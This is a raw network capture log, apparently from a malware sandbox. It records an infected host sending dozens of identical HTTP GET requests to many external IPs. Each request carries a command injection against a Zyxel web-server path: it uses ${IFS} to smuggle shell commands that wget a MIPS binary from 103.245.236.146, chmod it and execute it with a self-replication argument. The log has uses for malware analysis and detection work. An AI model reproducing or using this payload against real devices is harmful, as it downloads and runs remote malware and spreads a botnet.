                                              Jan 29, 2024 07:03:45.927158117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3326192.168.2.1447574153.115.117.123443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.927206039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3327192.168.2.144921051.126.174.26443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.927262068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3328192.168.2.144128645.184.180.76443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.927300930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3329192.168.2.144097852.117.28.252443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.927328110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3330192.168.2.1453028101.217.115.86443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.927367926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3331192.168.2.145870024.214.183.80443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.927383900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3332192.168.2.145206062.100.97.111443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.927439928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3333192.168.2.1434778164.249.201.127443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.927463055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3334192.168.2.1432826197.200.12.81443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.927536964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3335192.168.2.1459570173.239.117.104443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.927556038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3336192.168.2.1452268160.144.107.6443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.927613020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3337192.168.2.1434830128.137.221.197443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.927653074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3338192.168.2.1456802165.98.35.75443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.927710056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3339192.168.2.1454714211.181.251.110443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.927726030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3340192.168.2.144684638.57.247.142443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.927763939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3341192.168.2.1450690136.28.141.2443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.927809954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3342192.168.2.1445054101.93.202.102443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.927850008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3343192.168.2.1447526173.187.38.2443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.927901983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3344192.168.2.1456764112.105.28.9443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.927931070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3345192.168.2.1456968159.64.126.143443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.927978992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3346192.168.2.1440028199.137.94.218443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.928003073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3347192.168.2.145267860.73.243.144443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.928067923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3348192.168.2.1449862181.44.131.192443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.928107977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3349192.168.2.1458934123.63.114.35443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.928139925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3350192.168.2.1439228106.148.42.151443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.928180933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3351192.168.2.1436606176.111.74.119443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.928219080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3352192.168.2.144975897.81.10.72443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.928276062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3353192.168.2.14482225.89.5.44443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.928320885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3354192.168.2.144037042.121.193.35443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.928358078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3355192.168.2.143465036.55.23.55443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.928395033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3356192.168.2.143435835.15.153.74443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.928435087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3357192.168.2.145345869.49.109.81443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.928481102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3358192.168.2.1456592116.206.108.236443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.928528070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3359192.168.2.145940049.11.234.21443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.928572893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3360192.168.2.1440490194.214.123.95443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.928591967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3361192.168.2.1441280134.231.116.76443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.928636074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3362192.168.2.1446562201.253.95.252443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.928685904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3363192.168.2.14379104.203.250.63443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.928738117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3364192.168.2.1446800187.80.133.205443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.928769112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3365192.168.2.143407654.27.43.58443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.928803921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3366192.168.2.1448444176.206.93.220443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.928850889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3367192.168.2.1437760185.243.40.251443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.928899050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3368192.168.2.1450240146.70.202.34443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.928956032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3369192.168.2.145387297.214.242.198443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.928986073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3370192.168.2.145594266.119.21.160443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.929012060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3371192.168.2.1452760182.103.55.9443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.929059982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3372192.168.2.1439016222.208.7.242443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.929090977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3373192.168.2.145106265.32.51.235443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.929122925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3374192.168.2.145914088.25.234.58443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.929157019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3375192.168.2.145034070.175.39.101443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.929183006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3376192.168.2.1455134209.184.4.248443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.929219961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3377192.168.2.1442308134.83.42.230443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.929250956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3378192.168.2.1439688169.143.164.40443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.929284096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3379192.168.2.1459422116.117.239.137443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.929311991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3380192.168.2.143387643.165.41.252443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.929347038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3381192.168.2.1451752144.121.40.163443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.929374933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3382192.168.2.1458266205.18.2.41443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.929421902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3383192.168.2.1447710200.115.158.174443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.929445028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3384192.168.2.1435042103.193.23.210443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.929495096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3385192.168.2.1453916174.227.74.204443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.929516077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3386192.168.2.1459192206.177.15.39443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.929574013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3387192.168.2.1435106193.202.190.220443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.929609060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3388192.168.2.1433842220.237.81.29443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.929646969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3389192.168.2.1447168174.125.53.164443
                                              TimestampBytes transferredDirectionData
